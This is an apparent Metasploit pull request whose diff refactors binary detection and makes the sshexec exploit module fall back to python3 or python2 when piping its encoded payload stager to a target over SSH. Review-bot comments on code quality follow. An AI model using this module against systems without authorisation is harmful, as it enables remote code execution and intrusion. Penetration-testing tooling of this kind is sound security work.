Fallback to Python3 in sshexec when it's available #15358

Merged
merged 1 commit into from
Jun 22, 2021
29 changes: 20 additions & 9 deletions lib/msf/base/sessions/command_shell.rb
Expand Up @@ -328,22 +328,33 @@ def cmd_shell(*args)
print_error("Can not pop up an interactive shell")
end

def self.binary_exists(binary, platform: nil, &block)
if block.call('command -v command').to_s.strip == 'command'
binary_path = block.call("command -v '#{binary}' && echo true").to_s.strip
else
binary_path = block.call("which '#{binary}' && echo true").to_s.strip
end
return nil unless binary_path.include?('true')

binary_path.split("\n")[0].strip # removes 'true' from stdout
end

#
# Returns path of a binary in PATH env.
#
def binary_exists(binary)
print_status("Trying to find binary(#{binary}) on target machine")
if shell_command_token('command -v command').to_s.strip == 'command'
binary_path = shell_command_token("command -v '#{binary}' && echo true").to_s.strip
else
binary_path = shell_command_token("which '#{binary}' && echo true").to_s.strip
print_status("Trying to find binary '#{binary}' on the target machine")

binary_path = self.class.binary_exists(binary, platform: platform) do |command|
shell_command_token(command)
end
unless binary_path.include?("true")

if binary_path.nil?
print_error("#{binary} not found")
return nil
else
print_status("Found #{binary} at #{binary_path}")
end
binary_path = binary_path.split("\n")[0].strip #removes 'true' from stdout
print_status("Found #{binary} at #{binary_path}")

return binary_path
end
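Review bot: In `self.binary_exists(binary, platform: nil, &block)` the `platform:` keyword is accepted but never read. Both branches run the POSIX `command -v` / `which` probes regardless, so either branch on it or drop the parameter so callers do not assume it has an effect. The new class method also has no doc comment, unlike the instance method below it; it should say that the block must run the given command and return its output. Separately, `binary_path.include?('true')` matches the substring anywhere in the returned output, so any output that happens to contain "true" passes the check; comparing the last line to `'true'` would be stricter. `binary` is interpolated between single quotes without escaping, which is fine for the literal names passed here but would need `Shellwords.escape` if a caller ever passes variable input.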

15 changes: 14 additions & 1 deletion modules/exploits/multi/ssh/sshexec.rb
Expand Up @@ -199,13 +199,26 @@ def do_login(ip, user, pass, port)
fail_with(Failure::Unknown, 'Failed to start SSH socket') unless ssh_socket
end

def binary_exists(binary, platform: nil)
Msf::Sessions::CommandShell.binary_exists(binary, platform: platform, &method(:execute_command))
end

def execute_python
python_binary = binary_exists('python', platform: 'unix')
python_binary ||= binary_exists('python3', platform: 'unix')
python_binary ||= binary_exists('python2', platform: 'unix')
fail_with(Failure::NoTarget, 'Python was not found on the target system') if python_binary.nil?

execute_command("echo \"#{payload.encoded}\" | #{python_binary}")
end

def exploit
do_login(datastore['RHOST'], datastore['USERNAME'], datastore['PASSWORD'], datastore['RPORT'])
print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending stager...")

case target['Platform']
when 'python'
execute_command("python -c \"#{payload.encoded}\"")
execute_python
when 'unix'
execute_command(payload.encoded)
else
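Review bot: In `execute_python`, `#{python_binary}` is interpolated unquoted into the command string, so a path returned by the probe that contains whitespace would be split into several words; quote or escape it before building the command. The same line switches from `python -c` to `echo "..." | ...`, and `echo` treats backslash sequences differently across shells, so `printf '%s'` would be the more portable choice. Each `binary_exists` call also repeats the `command -v command` check, so the three fallbacks can cost up to six remote commands; probing once and reusing the result would avoid that. The `platform: 'unix'` argument passed here has no effect, since the helper in command_shell.rb does not read it.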